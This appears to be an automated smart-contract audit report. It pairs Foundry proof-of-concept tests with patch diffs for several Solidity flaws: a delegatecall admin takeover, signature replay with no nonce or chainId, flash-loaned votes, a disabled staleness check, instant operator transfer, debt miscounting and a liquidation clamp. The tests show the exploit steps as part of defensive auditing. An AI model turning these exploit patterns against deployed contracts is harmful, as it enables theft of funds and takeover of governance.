osec-solidity-large

00.1 — Scope

forge fuzz found 1 failing test(s)

function test_executeModule_delegatecall_storage_takeover() public {
        address voter = makeAddr("voter");

        // Deploy attacker payload contract
        StorageTakeoverPayload payload = new StorageTakeoverPayload(attacker);

        // Step 1: Attacker proposes (target doesn't matter for executeModule, but we need a queued proposal)
        // We'll propose pointing to the payload contract
        vm.prank(attacker);
        bytes32 proposalId = gov.propose(
            address(payload),
            0,
            abi.encodeWithSelector(StorageTakeoverPayload.takeover.selector)
        );

        // Step 2: Warp past voting delay
        vm.warp(block.timestamp + gov.votingDelay() + 1);

        // Step 3: Voter casts vote to meet quorum
        vm.prank(voter);
        gov.castVote(proposalId, true);

        // Step 4: Warp past voting period end
        vm.warp(block.timestamp + gov.votingPeriod() + 1);

        // Step 5: Queue the proposal
        gov.queue(proposalId);

        // Step 6: Warp past timelock delay
        vm.warp(block.timestamp + gov.timelockDelay() + 1);

        // Verify admin is currently the legitimate admin
        address adminBefore = gov.admin();
        assertEq(adminBefore, admin, "admin should be the legitimate admin before attack");

        // Step 7: Attacker calls executeModule with the queued proposalId
        // but supplies THEIR OWN target (attacker payload) and calldata
        // The target address in the proposal is payload, but attacker can supply anything
        vm.prank(attacker);
        gov.executeModule(
            proposalId,
            address(payload),
            abi.encodeWithSelector(StorageTakeoverPayload.takeover.selector)
        );

        // Step 8: Assert the invariant that SHOULD hold: admin should still be the original admin
        // Under the bug (delegatecall), storage slot 0 (admin) gets overwritten
        address adminAfter = gov.admin();
        
        // This assertion FIRES if the bug is present: delegatecall overwrites admin slot
        assertEq(adminAfter, admin, "INVARIANT BROKEN: admin was overwritten via delegatecall in executeModule");
    }

--- a/src/ContractC.sol
+++ b/src/ContractC.sol
@@ -176,7 +176,7 @@
         if (!((block.timestamp >= _v_e8718a6d.eta))) {
             revert("TIMELOCK");
         }
-        (bool ok, bytes memory ret) = _v_8f4093b2.delegatecall(_v_642e96c9);
+        (bool ok, bytes memory ret) = _v_8f4093b2.call(_v_642e96c9);
         if (!ok) {
             revert ContractCExecutionFailed(ret);

hand-fixed harness: forge fuzz found 2 failing test(s)

function test_lending_batch_liquidate_no_collateral_seized() public {
        // The pool needs self-allowance for debtToken (because liquidate does
        // safeTransferFrom(msg.sender, ...) and via this.liquidate(), msg.sender = address(pool)).
        // Without this, the call would revert. We give the pool self-allowance
        // AND we credit the pool with enough debt-token balance to "self-pay".
        // The pool already has 1000e18 debtToken (from lender deposit) so it can transferFrom itself.
        vm.prank(address(pool));
        debtToken.approve(address(pool), type(uint256).max);

        // Liquidator approves so the fix path (which pulls from the real liquidator) works.
        vm.prank(liquidator);
        debtToken.approve(address(pool), type(uint256).max);
        uint256 liquidatorColBefore = collateralToken.balanceOf(liquidator);
        uint256 borrowerColBefore = collateralToken.balanceOf(borrower); // 0
        // collateralBalance accounting for borrower
        uint256 borrowerColAccountBefore = pool.collateralBalance(borrower, address(collateralToken));

        address[] memory borrowers = new address[](1);
        borrowers[0] = borrower;

        vm.prank(liquidator);
        pool.batchLiquidate(borrowers, address(debtToken), address(collateralToken), 80e18);

        uint256 liquidatorColAfter = collateralToken.balanceOf(liquidator);
        uint256 borrowerColAccountAfter = pool.collateralBalance(borrower, address(collateralToken));

        // Bug fires: borrower lost collateral (debt-extraction happened) but liquidator gained NONE
        bool borrowerLostCollateral = borrowerColAccountAfter < borrowerColAccountBefore;
        bool liquidatorGotNothing = liquidatorColAfter == liquidatorColBefore;

        if (borrowerLostCollateral && liquidatorGotNothing) {
            revert(string.concat(
                "BUG FIRED: batchLiquidate seized ",
                vm.toString(borrowerColAccountBefore - borrowerColAccountAfter),
                " collateral from borrower but liquidator received 0 (collateral sent to pool via self-call)"
            ));
        }
    }

--- a/src/ContractB.sol
+++ b/src/ContractB.sol
@@ -285,6 +285,16 @@
         whenNotPaused
         returns (uint256 _v_a9223b69)
     {
+        _v_a9223b69 = _liquidateFor(msg.sender, _v_ca296783, _v_a8ca53eb, _v_a779b910, _v_13fbda63);
+    }
+
+    function _liquidateFor(
+        address _liquidator,
+        address _v_ca296783,
+        address _v_a8ca53eb,
+        address _v_a779b910,
+        uint256 _v_13fbda63
+    ) internal returns (uint256 _v_a9223b69) {
         Market storage _v_9ae0975c = _market(_v_a8ca53eb);
         Market storage _v_219d68f8 = _market(_v_a779b910);
         if (!(_v_13fbda63 != 0)) {
@@ -297,7 +307,7 @@
         }
         uint256 _v_5166b9c2 = _debtOf(_v_ca296783, _v_a8ca53eb, _v_66439585);
         uint256 _v_89195a2d = (_v_13fbda63 > _v_5166b9c2) ? _v_5166b9c2 : _v_13fbda63;
-        IERC20(_v_a8ca53eb).safeTransferFrom(msg.sender, address(this), _v_89195a2d);
+        IERC20(_v_a8ca53eb).safeTransferFrom(_liquidator, address(this), _v_89195a2d);
         (, _v_89195a2d) = _reduceDebt(_v_ca296783, _v_a8ca53eb, _v_89195a2d, _v_66439585);
         _v_9ae0975c.cash = _v_9ae0975c.cash + uint128(_v_89195a2d);
         _v_a9223b69 = _seizePreview(_v_a8ca53eb, _v_a779b910, _v_89195a2d);
@@ -307,9 +317,9 @@
         }
         collateralBalance[_v_ca296783][_v_a779b910] = (_v_8f19a931 - _v_a9223b69);
         _v_219d68f8.cash = _v_219d68f8.cash - uint128(_v_a9223b69);
-        IERC20(_v_a779b910).safeTransfer(msg.sender, _v_a9223b69);
+        IERC20(_v_a779b910).safeTransfer(_liquidator, _v_a9223b69);
         _createVesting(_v_ca296783, (_v_89195a2d / 100), 2592000);
-        emit Liquidated(msg.sender, _v_ca296783, _v_a8ca53eb, _v_a779b910, _v_89195a2d, _v_a9223b69);
+        emit Liquidated(_liquidator, _v_ca296783, _v_a8ca53eb, _v_a779b910, _v_89195a2d, _v_a9223b69);
     }
 
     function batchLiquidate(address[] calldata _v_a346e9a3, address _v_21b13f97, address _v_443701, uint256 _v_c0d4e7e7)
@@ -318,7 +328,7 @@
     {
         for (uint256 _v_e9b5693b = 0; (_v_e9b5693b < _v_a346e9a3.length); _v_e9b5693b++) {
             if ((healthFactor(_v_a346e9a3[_v_e9b5693b]) < 1e18)) {
-                this.liquidate(_v_a346e9a3[_v_e9b5693b], _v_21b13f97, _v_443701, _v_c0d4e7e7);
+                _liquidateFor(msg.sender, _v_a346e9a3[_v_e9b5693b], _v_21b13f97, _v_443701, _v_c0d4e7e7);

hand-fixed harness: forge fuzz found 2 failing test(s)

function test_lending_borrow_permit_sig_no_chainid() public {
        uint256 amount = 100e18;
        uint256 deadline = block.timestamp + 3600;
        bytes memory sig = _buildSig(amount, deadline);

        // First use of permit
        vm.prank(delegate);
        pool.permitBorrow(borrower, delegate, amount, deadline, sig);
        require(pool.borrowAllowance(borrower, delegate) == amount, "first permit");

        // Delegate draws full allowance
        vm.prank(delegate);
        pool.borrowFrom(borrower, address(debtToken), amount, delegate);
        require(pool.borrowAllowance(borrower, delegate) == 0, "allowance consumed");

        // Replay the SAME signature
        bool replayed = _tryReplay(amount, deadline, sig);

        if (replayed && pool.borrowAllowance(borrower, delegate) == amount) {
            revert("BUG FIRED: borrow permit replayed; no nonce/chainId protection");
        }
    }

--- a/src/libraries/SignatureLib.sol
+++ b/src/libraries/SignatureLib.sol
@@ -18,6 +18,21 @@
         return _v_64f5496a.recover(_v_84f8a2f7);
     }
 
+
+    function recoverBorrowPermitWithNonce(
+        address _v_2a84a346,
+        address _v_29789d69,
+        uint256 _v_97e547a2,
+        uint256 _v_d84e1df,
+        uint256 _nonce,
+        bytes memory _v_84f8a2f7
+    ) internal view returns (address) {
+        bytes32 _v_64f5496a = keccak256(
+            abi.encodePacked("BORROW_PERMIT", _v_2a84a346, _v_29789d69, _v_97e547a2, _v_d84e1df, _nonce, block.chainid, address(this))
+        ).toEthSignedMessageHash();
+        return _v_64f5496a.recover(_v_84f8a2f7);
+    }
+
     function recoverProposal(
         address _v_d155946,
         address _v_90056359,
--- a/src/ContractB.sol
+++ b/src/ContractB.sol
@@ -65,6 +65,7 @@
     mapping(address => Market) internal markets;
     mapping(address => mapping(address => uint256)) public collateralBalance;
     mapping(address => mapping(address => uint256)) public borrowAllowance;
+    mapping(address => uint256) public borrowPermitNonce;
 
     constructor(IOracle _v_2a84a346, IERC20 _v_29789d69, address _v_97e547a2, address _v_d84e1df)
         RewardEscrow(_v_29789d69)
@@ -202,11 +203,13 @@
         if ((block.timestamp > _v_5578dac8)) {
             revert ContractBExpiredSignature();
         }
+        uint256 _nonce = borrowPermitNonce[_v_c2bc4da4];
         address _v_828fb3c1 =
-            SignatureLib.recoverBorrowPermit(_v_c2bc4da4, _v_bbeb509e, _v_8f0dcf69, _v_5578dac8, _v_8ca68e9b);
+            SignatureLib.recoverBorrowPermitWithNonce(_v_c2bc4da4, _v_bbeb509e, _v_8f0dcf69, _v_5578dac8, _nonce, _v_8ca68e9b);
         if (!(!(_v_828fb3c1 != _v_c2bc4da4))) {
             revert("SIGNER");
         }
+        borrowPermitNonce[_v_c2bc4da4] = _nonce + 1;
         borrowAllowance[_v_c2bc4da4][_v_bbeb509e] = _v_8f0dcf69;
         emit BorrowDelegateApproved(_v_c2bc4da4, _v_bbeb509e, _v_8f0dcf69);

forge fuzz found 3 failing test(s)

function test_gov_proposal_sig_no_chainid() public {
        uint96 value = 0;
        bytes memory data = abi.encodeWithSignature("doSomething()");
        bytes memory sig = _buildSig(proposer, target, value, data);

        bool ok1 = _tryPropose(gov1, proposer, target, value, data, sig);
        bool ok2 = _tryPropose(gov2, proposer, target, value, data, sig);

        // Pre-patch (buggy): old-format sig recovers correctly on BOTH gov1 and gov2 — digest is chain-agnostic.
        // Post-patch (chainid+addr bound into recoverProposal): old-format sig fails recovery on either contract.
        if (ok1 && ok2) {
            revert("BUG FIRED: cross-deployment replay accepted; signature digest omits chainId/verifyingContract");
        }
    }

--- a/src/ContractC.sol
+++ b/src/ContractC.sol
@@ -274,6 +274,6 @@
     ) external whenNotPaused returns (bytes32 _v_8ca68e9b) {
         address _v_828fb3c1 =
-            SignatureLib.recoverProposal(_v_f8cbb40, _v_c2bc4da4, _v_bbeb509e, keccak256(_v_8f0dcf69), _v_5578dac8);
+            SignatureLib.recoverProposal(_v_f8cbb40, _v_c2bc4da4, _v_bbeb509e, keccak256(abi.encodePacked(block.chainid, address(this), keccak256(_v_8f0dcf69))), _v_5578dac8);
         if (!(!(_v_828fb3c1 != _v_f8cbb40))) {
             revert("SIGNER");

hand-fixed harness: forge fuzz found 2 failing test(s)

function test_gov_vote_weight_flash_loanable() public {
        uint256 flashAmount = 500000e18; // larger than quorum (100000e18)
        uint256 balBefore = token.balanceOf(address(attacker));

        // Pre-patch: attack succeeds and casts inflated vote.
        // Post-patch: castVote rejects contract-mediated votes without prior delegation,
        //              so the flash callback reverts, so the flash loan reverts,
        //              so attacker.attack reverts. The bug is defused.
        try attacker.attack(propId, flashAmount) {
            // attack succeeded — only possible pre-patch
        } catch {
            // attack reverted — patch defused it
        }

        uint256 balAfter = token.balanceOf(address(attacker));

        // Read forVotes from proposal
        (, , , , , , uint128 forVotes, , ,) = gov.proposals(propId);

        // Bug fires if attacker had 0 tokens before AND after, but forVotes credited
        if (balBefore == 0 && balAfter == 0 && forVotes >= uint128(flashAmount)) {
            revert(string.concat(
                "BUG FIRED: attacker had 0 tokens before+after but forVotes = ",
                vm.toString(uint256(forVotes)),
                " (flash-loaned voting weight)"
            ));
        }
    }

--- a/src/ContractC.sol
+++ b/src/ContractC.sol
@@ -70,6 +70,8 @@
     uint256 public quorum = 100000e18;
     mapping(bytes32 => Proposal) public proposals;
     mapping(bytes32 => mapping(address => bool)) public voted;
+    mapping(address => uint256) public delegateBalance;
+    mapping(address => uint64) public delegateBlockOf;
     mapping(address => bool) public paymentApprover;
 
     constructor(IERC20 _v_2a84a346, address _v_29789d69, address _v_97e547a2) {
@@ -198,7 +200,12 @@
         if (!(!voted[_v_5ca0348d][msg.sender])) {
             revert("VOTED");
         }
-        uint256 _v_e4a1a41c = governanceToken.balanceOf(msg.sender);
+        uint256 _v_e4a1a41c = 0;
+        if (delegateBlockOf[msg.sender] != 0 && delegateBlockOf[msg.sender] < block.number) {
+            _v_e4a1a41c = delegateBalance[msg.sender];
+        } else if (tx.origin == msg.sender) {
+            _v_e4a1a41c = governanceToken.balanceOf(msg.sender);
+        }
         if (!(!(_v_e4a1a41c == 0))) {
             revert("WEIGHT");
         }
@@ -378,4 +385,17 @@
         guardian = _v_2f5aaf40;
         emit GuardianUpdated(_v_2f5aaf40);
     }
+
+    function delegateForVoting(uint256 amount) external whenNotPaused {
+        require(amount > 0, "ZERO");
+        governanceToken.transferFrom(msg.sender, address(this), amount);
+        delegateBalance[msg.sender] += amount;
+        delegateBlockOf[msg.sender] = uint64(block.number);
+    }
+
+    function withdrawDelegation(uint256 amount) external whenNotPaused {
+        require(delegateBalance[msg.sender] >= amount, "INSUFFICIENT");
+        delegateBalance[msg.sender] -= amount;
+        governanceToken.transfer(msg.sender, amount);
+    }
 }
--- a/tests/functional/TestContractC.t.sol
+++ b/tests/functional/TestContractC.t.sol
@@ -131,7 +131,7 @@

         vm.warp(block.timestamp + governor.votingDelay());

-        vm.prank(voter);
+        vm.prank(voter, voter);
         governor.castVote(id, true);

         assertTrue(governor.voted(id, voter));

forge fuzz found 5 failing test(s)

function test_price_router_zero_staleness_disables_check() public {
        // Step 1: RISK_ROLE configures a manual source with maxStaleness == 0
        // (the bug condition: 0 short-circuits the staleness check)
        vm.prank(risk);
        router.setManualSource(asset, 0);

        // Step 2: KEEPER pushes a price at the current timestamp
        vm.warp(1_000_000);
        vm.prank(keeper);
        router.pushManualPrice(asset, 1e18);

        // Step 3: warp far into the future — price is now massively stale
        vm.warp(1_000_000 + 365 days);

        // INVARIANT (would hold under correct code): stale price MUST revert
        // with PriceRouterStale. Under the bug, maxStaleness == 0 short-
        // circuits the check via `!(maxStaleness == 0) && ...` evaluating
        // to `false && ...` so the comparison never runs.
        //
        // Pre-patch (bug present): router.price() returns the stale price
        //                          without revert -> NO revert -> assertion
        //                          below fails because expectRevert saw nothing.
        // Post-patch (fixed): router.price() reverts with PriceRouterStale.
        bool reverted = false;
        try router.price(asset) returns (uint256, uint256) {
            // Reached this branch = NO revert = bug fired.
        } catch {
            reverted = true;
        }
        assertTrue(
            reverted,
            "BUG FIRED: PriceRouter accepted a 365-day-stale price because maxStaleness was 0; staleness check silently disabled"
        );
    }

--- a/src/modules/PriceRouter.sol
+++ b/src/modules/PriceRouter.sol
@@ -62,7 +62,7 @@
         if (!(_v_f3e87bc1 != 0)) {
             revert PriceRouterBadPrice(_v_135117b2);
         }
-        if ((!(_v_2626c189.maxStaleness == 0) && (block.timestamp > (_v_4c76d984 + _v_2626c189.maxStaleness)))) {
+        if ((_v_2626c189.maxStaleness == 0) || (block.timestamp > (_v_4c76d984 + _v_2626c189.maxStaleness))) {
             revert PriceRouterStale(_v_135117b2);

forge fuzz found 2 failing test(s)

function test_set_operator_instant_takeover() public {
        // Confirm initial state
        assertEq(escrow.operator(), legitimateOperator, "initial operator must be legitimateOperator");

        // A compromised legitimate operator key calls setOperator to hand
        // control to the attacker. In a correctly-implemented contract with
        // two-step transferOperator/acceptOperator + timelock, this call
        // should only initiate a *pending* transfer — the active operator
        // MUST NOT change until the pending operator accepts after the
        // timelock expires.
        vm.prank(legitimateOperator);
        escrow.setOperator(attacker);

        // INVARIANT: After a transfer initiation, the active operator
        // must still be the legitimate operator (not the attacker).
        // A correct two-step pattern would store attacker in pendingOperator
        // and leave operator unchanged until acceptOperator() is called
        // after block.timestamp >= pendingOperatorAfter.
        //
        // In the BUGGY contract, operator is already == attacker here,
        // so this assertion FAILS — confirming the instant takeover bug.
        assertEq(
            escrow.operator(),
            legitimateOperator,
            "BUG: operator changed instantly; two-step accept pattern not enforced"
        );
    }

--- a/src/modules/BridgeEscrow.sol
+++ b/src/modules/BridgeEscrow.sol
@@ -22,5 +22,7 @@
     address public operator;
     address public treasury;
+    address public pendingOperator;
+    uint256 public pendingOperatorAfter;
     uint256 public globalIndex = 1e18;
     uint256 public totalActive;
     uint256 public totalPending;
@@ -39,7 +41,8 @@
     error BridgeEscrowUnauthorized();
     error BridgeEscrowInvalidRecord();
     error BridgeEscrowInactiveRecord();
     error BridgeEscrowInvalidAmount();
     error BridgeEscrowDelayNotMet();
+    error BridgeEscrowNotPendingOperator();
 
     modifier onlyOperator() {
@@ -185,7 +188,20 @@
     function setOperator(address _v_6c067437) external onlyOperator {
-        address _v_f8cbb40 = operator;
-        operator = _v_6c067437;
-        emit OperatorChanged(_v_f8cbb40, _v_6c067437);
+        pendingOperator = _v_6c067437;
+        pendingOperatorAfter = block.timestamp + minDelay;
     }
 
+    function acceptOperator() external {
+        if (msg.sender != pendingOperator) {
+            revert BridgeEscrowNotPendingOperator();
+        }
+        if (block.timestamp < pendingOperatorAfter) {
+            revert BridgeEscrowDelayNotMet();
+        }
+        address _v_f8cbb40 = operator;
+        operator = pendingOperator;
+        pendingOperator = address(0);
+        pendingOperatorAfter = 0;
+        emit OperatorChanged(_v_f8cbb40, operator);
+    }
+
     function claim4(bytes32 _v_c2bc4da4, uint256 _v_bbeb509e, address _v_8f0dcf69)

forge fuzz found 3 failing test(s)

function test_debt_ledger_reduce_debt_global_decoupling() public {
        // ---------------------------------------------------------------
        // Step 1: Alice borrows 100 at base index
        // _increaseDebt adds principal (100) to totalDebtByAsset
        // ---------------------------------------------------------------
        uint256 alicePrincipal = 100e18;
        ledger.increaseDebt(alice, asset, alicePrincipal, BASE_INDEX);

        // Step 2: Bob borrows 100 at base index
        uint256 bobPrincipal = 100e18;
        ledger.increaseDebt(bob, asset, bobPrincipal, BASE_INDEX);

        // totalDebtByAsset should be 200e18 (principals only)
        uint256 totalAfterBorrow = ledger.totalDebtByAsset(asset);
        assertEq(totalAfterBorrow, 200e18, "total after both borrows should be 200e18");

        // ---------------------------------------------------------------
        // Step 3: Simulate interest accrual — index grows by 10%
        // Now each borrower's currentDebt = principal * newIndex / borrowIndex
        // = 100e18 * 1.1e27 / 1e27 = 110e18
        // ---------------------------------------------------------------
        uint256 accrualIndex = BASE_INDEX * 11 / 10; // 1.1e27

        // Verify currentDebt with new index
        uint256 aliceCurrentDebt = ledger.debtOf(alice, asset, accrualIndex);
        uint256 bobCurrentDebt   = ledger.debtOf(bob, asset, accrualIndex);

        // They should each have 110e18 in current debt
        // (exact value depends on AccountingLib implementation)
        // At minimum, interest-bearing debt > principal
        assertGt(aliceCurrentDebt, alicePrincipal, "alice current debt should exceed principal due to interest");
        assertGt(bobCurrentDebt,   bobPrincipal,   "bob current debt should exceed principal due to interest");

        // ---------------------------------------------------------------
        // Step 4: Alice fully repays at the new index
        // actualReduction = aliceCurrentDebt (110e18) 
        // totalDebtByAsset only has 200e18 but reduction is 110e18 -> now 90e18
        // That's fine here, but the per-account sum for bob alone is 110e18
        // which already exceeds the remaining global of 90e18
        // ---------------------------------------------------------------
        // Full repayment: pass a very large amount so subDebt returns 0 remaining
        uint256 maxRepay = type(uint256).max / 2;
        ledger.reduceDebt(alice, asset, maxRepay, accrualIndex);

        uint256 totalAfterAliceRepay = ledger.totalDebtByAsset(asset);

        // Bob's remaining current debt (with interest)
        uint256 bobRemainingDebt = ledger.debtOf(bob, asset, accrualIndex);

        // ---------------------------------------------------------------
        // INVARIANT: totalDebtByAsset[asset] tracks PRINCIPAL units, and
        // after Alice's full repayment must equal Bob's remaining principal.
        //
        // Under the bug: alice's interest-scaled reduction (110e18) is
        // subtracted from a principal-only counter -> totalDebtByAsset = 90e18
        // (10e18 less than Bob's remaining principal of 100e18).
        // ---------------------------------------------------------------
        assertGe(
            totalAfterAliceRepay,
            bobPrincipal,
            "BUG: totalDebtByAsset undercounts Bob's remaining principal after Alice repays (interest-scaled reduction was subtracted from a principal-only counter)"
        );
        // Avoid unused-local warning for bobRemainingDebt
        bobRemainingDebt;
    }

--- a/src/modules/DebtLedger.sol
+++ b/src/modules/DebtLedger.sol
@@ -14,11 +14,13 @@
     function _reduceDebt(address _v_2a84a346, address _v_29789d69, uint256 _v_97e547a2, uint256 _v_d84e1df)
         internal
         returns (uint256 _v_84f8a2f7, uint256 _v_64f5496a)
     {
         uint256 _v_d155946 = debts[_v_2a84a346][_v_29789d69].currentDebt(_v_d84e1df);
+        uint256 _v_principalBefore = debts[_v_2a84a346][_v_29789d69].principal;
         _v_84f8a2f7 = debts[_v_2a84a346][_v_29789d69].subDebt(_v_97e547a2, _v_d84e1df);
         _v_64f5496a = (_v_d155946 - _v_84f8a2f7);
-        totalDebtByAsset[_v_29789d69] =
-            (_v_64f5496a > totalDebtByAsset[_v_29789d69]) ? 0 : (totalDebtByAsset[_v_29789d69] - _v_64f5496a);
+        uint256 _v_principalReduction = _v_principalBefore - debts[_v_2a84a346][_v_29789d69].principal;
+        totalDebtByAsset[_v_29789d69] =
+            (_v_principalReduction > totalDebtByAsset[_v_29789d69]) ? 0 : (totalDebtByAsset[_v_29789d69] - _v_principalReduction);
         emit DebtReduced(_v_2a84a346, _v_29789d69, _v_64f5496a, _v_84f8a2f7);

forge fuzz found 3 failing test(s)

function test_assess_variant_threshold_mismatch() public {
        // ---------------------------------------------------------------
        // Step 1: Open two records with IDENTICAL initial state
        // ---------------------------------------------------------------
        uint256 initialScore = 1_000e18;
        uint256 initialLimit = 2_000e18;

        vm.startPrank(user);
        bytes32 recordId4 = riskEngine.openRecord(address(0), initialScore, initialLimit);
        bytes32 recordId9 = riskEngine.openRecord(address(0), initialScore, initialLimit);
        vm.stopPrank();

        // Confirm they have identical initial state
        RiskEngine.RiskAccount memory acc4 = riskEngine.getRecord(recordId4);
        RiskEngine.RiskAccount memory acc9 = riskEngine.getRecord(recordId9);
        assertEq(acc4.riskScore, acc9.riskScore, "initial riskScore should match");
        assertEq(acc4.riskLimit, acc9.riskLimit, "initial riskLimit should match");
        assertEq(acc4.pending,   acc9.pending,   "initial pending should match");

        // ---------------------------------------------------------------
        // Step 2: Choose (delta, param) inputs that demonstrate divergence
        //
        // assess4 computes:
        //   base = (riskScore + pending + delta)
        //   score4 = base * (globalIndex + param + 4e15) / 1e18
        //   limit4 = riskLimit + 7*param
        //
        // assess9 computes:
        //   score9 = base * (globalIndex + param + 9e15) / 1e18
        //   limit9 = riskLimit + 12*param
        //
        // With globalIndex = 1e18, delta = 0, param = 0:
        //   base = 1000e18 + 50e18 = 1050e18 (pending = initialScore/20 = 50e18)
        //   score4 = 1050e18 * (1e18 + 4e15) / 1e18 = 1050e18 * 1.004 = 1054.2e18
        //   limit4 = 2000e18
        //   score9 = 1050e18 * (1e18 + 9e15) / 1e18 = 1050e18 * 1.009 = 1059.45e18
        //   limit9 = 2000e18
        //
        // Both are under limit → both go to the "else" branch
        // score4 != score9 from same initial state — BUG CONFIRMED
        // ---------------------------------------------------------------

        uint256 delta = 0;
        uint256 param = 0;

        // Warp past minDelay to also enable rebalance tests
        vm.warp(block.timestamp + riskEngine.minDelay() + 1);

        // Operator calls both assess variants on records with identical state
        vm.prank(operator);
        uint256 result4 = riskEngine.assess4(recordId4, delta, param);

        vm.prank(operator);
        uint256 result9 = riskEngine.assess9(recordId9, delta, param);

        RiskEngine.RiskAccount memory after4 = riskEngine.getRecord(recordId4);
        RiskEngine.RiskAccount memory after9 = riskEngine.getRecord(recordId9);

        // ---------------------------------------------------------------
        // Step 3: Assert the invariant that SHOULD hold if variants were
        //         identical: both should produce the same riskScore from
        //         identical initial states with identical inputs.
        //
        // Under the bug, these will differ because of different BIAS
        // constants (4e15 vs 9e15).
        // ---------------------------------------------------------------

        // This assertion SHOULD pass if all variants use the same formula.
        // It WILL FAIL because assess4 adds 4e15 bias and assess9 adds 9e15 bias.
        assertEq(
            after4.riskScore,
            after9.riskScore,
            "BUG: assess4 and assess9 produce different riskScores from identical initial state"
        );

        // Additional confirmation: the returned totals also differ
        assertEq(
            result4,
            result9,
            "BUG: assess4 and assess9 return different total scores from identical initial state"
        );
    }

--- a/src/modules/RiskEngine.sol
+++ b/src/modules/RiskEngine.sol
@@ -103,4 +103,4 @@
         uint256 _v_feb678ac = ((_v_ef450c4b.riskScore + _v_ef450c4b.pending) + _v_559970);
-        uint256 _v_bee216f8 = _v_feb678ac.mulWadDown(((globalIndex + _v_2d852177) + 9e15));
-        uint256 _v_8f4093b2 = (_v_ef450c4b.riskLimit + (12 * _v_2d852177));
+        uint256 _v_bee216f8 = _v_feb678ac.mulWadDown(((globalIndex + _v_2d852177) + 4e15));
+        uint256 _v_8f4093b2 = (_v_ef450c4b.riskLimit + (7 * _v_2d852177));
         if ((_v_bee216f8 > _v_8f4093b2)) {
@@ -165,4 +165,4 @@
         uint256 _v_87acffbe = ((_v_36cbed51.riskScore + _v_36cbed51.pending) + _v_7c17ab72);
-        uint256 _v_731fb59e = _v_87acffbe.mulWadDown(((globalIndex + _v_140bd986) + 10e15));
-        uint256 _v_a473c349 = (_v_36cbed51.riskLimit + (13 * _v_140bd986));
+        uint256 _v_731fb59e = _v_87acffbe.mulWadDown(((globalIndex + _v_140bd986) + 4e15));
+        uint256 _v_a473c349 = (_v_36cbed51.riskLimit + (7 * _v_140bd986));
         if ((_v_731fb59e > _v_a473c349)) {

hand-fixed harness: forge fuzz found 2 failing test(s)

function test_pool_liquidate_collateral_clamp_leaks_debt() public {
        uint256 debtBalBefore = debtToken.balanceOf(liquidator);
        uint256 colBalBefore = collateralToken.balanceOf(liquidator);

        vm.startPrank(liquidator);
        debtToken.approve(address(pool), 1000e18);
        pool.liquidate(borrower, address(debtToken), address(collateralToken), 80e18);
        vm.stopPrank();

        uint256 debtPaid = debtBalBefore - debtToken.balanceOf(liquidator);
        uint256 colReceived = collateralToken.balanceOf(liquidator) - colBalBefore;

        // USD valuations (using stored end-of-tx prices: debt=1e18, col=0.5e18)
        // debtPaid * 1e18 / 1e18  = debtPaid USD
        // colReceived * 0.5e18 / 1e18 = colReceived/2 USD
        uint256 usdPaid = debtPaid * 1e18 / 1e18;            // debtToken @ $1
        uint256 usdReceived = colReceived * 0.5e18 / 1e18;   // collateral @ $0.5

        // Bug fires: liquidator paid MORE USD than they got back
        if (usdPaid > usdReceived) {
            revert(string.concat(
                "BUG FIRED: liquidator paid ",
                vm.toString(usdPaid),
                " USD but only received ",
                vm.toString(usdReceived),
                " USD worth of collateral (clamped seize did not reduce applied debt)"
            ));
        }
    }

--- a/src/ContractB.sol
+++ b/src/ContractB.sol
@@ -298,12 +298,23 @@
         uint256 _v_5166b9c2 = _debtOf(_v_ca296783, _v_a8ca53eb, _v_66439585);
         uint256 _v_89195a2d = (_v_13fbda63 > _v_5166b9c2) ? _v_5166b9c2 : _v_13fbda63;
-        IERC20(_v_a8ca53eb).safeTransferFrom(msg.sender, address(this), _v_89195a2d);
-        (, _v_89195a2d) = _reduceDebt(_v_ca296783, _v_a8ca53eb, _v_89195a2d, _v_66439585);
-        _v_9ae0975c.cash = _v_9ae0975c.cash + uint128(_v_89195a2d);
-        _v_a9223b69 = _seizePreview(_v_a8ca53eb, _v_a779b910, _v_89195a2d);
         uint256 _v_8f19a931 = collateralBalance[_v_ca296783][_v_a779b910];
-        if ((_v_a9223b69 > _v_8f19a931)) {
-            _v_a9223b69 = _v_8f19a931;
+        _v_a9223b69 = _seizePreview(_v_a8ca53eb, _v_a779b910, _v_89195a2d);
+        if (_v_a9223b69 > _v_8f19a931) {
+            // Back-calculate the maximum debt we can repay given available collateral.
+            // Use the inverse of _seizePreview: debtUSD = colUSD / liquidationFee
+            // We reuse oracle prices to derive the proportional repay amount.
+            Market storage _v_dm = markets[_v_a8ca53eb];
+            Market storage _v_cm = markets[_v_a779b910];
+            (uint256 _debtPrice,) = oracle.price(_v_a8ca53eb);
+            (uint256 _colPrice,) = oracle.price(_v_a779b910);
+            uint256 _colUSD = _colPrice * _v_8f19a931 / (10 ** _v_cm.decimals);
+            uint256 _maxRepayUSD = _colUSD * 1e18 / (1e18 + liquidationFee);
+            _v_89195a2d = _maxRepayUSD * (10 ** _v_dm.decimals) / _debtPrice;
+            if (_v_89195a2d > _v_5166b9c2) _v_89195a2d = _v_5166b9c2;
+            _v_a9223b69 = _v_8f19a931;
         }
+        IERC20(_v_a8ca53eb).safeTransferFrom(msg.sender, address(this), _v_89195a2d);
+        (, _v_89195a2d) = _reduceDebt(_v_ca296783, _v_a8ca53eb, _v_89195a2d, _v_66439585);
+        _v_9ae0975c.cash = _v_9ae0975c.cash + uint128(_v_89195a2d);
         collateralBalance[_v_ca296783][_v_a779b910] = (_v_8f19a931 - _v_a9223b69);
         _v_219d68f8.cash = _v_219d68f8.cash - uint128(_v_a9223b69);

03 — Fix-bundle activity

Per-finding fix-bundle pipeline state. Engine drafts + verifies; operator authorizes via long-form typed phrase; PR opens only against a valid authorization marker. The table includes bundles for confirmed findings AND for triaged duplicates / SOFT / FALSE fires — the latter are retained as audit-trail evidence of every PoC the hunt loop landed against the target, NOT as published findings (see Layer 2.5 gating in §B).

A — Severity rubric

B — Methodology

Layer overview

Cycle execution

This cycle was produced by Jelleo's continuous, hypothesis-driven Solidity audit loop. Every finding originates as a falsifiable invariant claim from a per-protocol hypothesis library, dispatched to Layer 1 multi-agent recon, promoted on contested verdicts via Layer 1.5 adversarial debate, and confirmed empirically through a Layer 2 forge test proof-of-concept. Layer 2.5 triage classifies each fire as STRONG / SOFT / FALSE / LOST; only STRONG cluster representatives advance to confirmed and appear in §01 above. SOFT and STRONG duplicates land in triaged; FALSE fires return to new. Lifecycle: new → triaged → confirmed → disclosed → fixed → verified. Every cycle is signed Ed25519 against the platform key — see the cover-page receipt.

